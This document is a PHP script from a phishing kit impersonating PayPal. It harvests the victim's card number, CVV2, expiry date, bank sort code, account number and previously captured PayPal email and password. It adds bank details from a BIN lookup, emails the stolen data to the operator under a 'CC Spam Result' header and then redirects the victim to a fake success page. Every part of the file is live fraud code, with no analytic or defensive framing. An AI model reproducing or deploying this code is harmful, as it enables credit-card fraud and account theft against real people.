<?php
error_reporting(0);
include('../blocker.php');
include('../detect.php');
$bin     = str_replace(' ', '', $_POST['cc_number']);
$bin     = substr($bin, 0, 6);
$getbank = json_decode(file_get_contents("http://www.binlist.net/json/".$bin.""));
$ccbrand = $getbank->brand;
$ccbank  = $getbank->bank;
$cctype  = $getbank->card_type;
$ccklas  = $getbank->card_category;
$getpp   = explode('PayPal', file_get_contents('../Save/' . $ip . '.logged'));
$getadd  = explode('AddInfo', file_get_contents('../Save/' . $ip . '.logged'));
$message = "
++------[ $$ Card - DzeSezMii $$ ]------++

Email           : " . $getpp[1] . "
Password        : " . $getpp[2] . "

Cardholder Name :  " . $_POST['cc_holder'] . "
Card Number     :  " . $_POST['cc_number'] . "
Expiration Date :  " . $_POST['expdate_month'] . " / " . $_POST['expdate_year'] . "
Cvv2            :  " . $_POST['cvv2_number'] . "
BIN/IIN Info    :  " . $ccbank . " - " . $cctype . " - " . $ccklas . "
Sort Code       :  " . $_POST['sort_code1'] . " - " . $_POST['sort_code2'] . " - " . $_POST['sort_code3'] . "
Account Number  :  " . $_POST['acc_number'] . "

" . $getadd[1] . "

From            :  " . $ip . "
Browser         :  " . $agent . "

++-----[ $$ NGEPET $$ ]-----++
";
include('../____YourMail____.php');
$subject = $ccbrand . " ". $ccbank ." " . $cctype . " " . $ccklas . " [ " . $nama_negara . " - " . $ip . " ]";
$headers = "From: CC Spam Result <cc_rezult@spammerindo.com>";
mail($emailku, $subject, $message, $headers);
header("LOCATION: ../success.php");
?>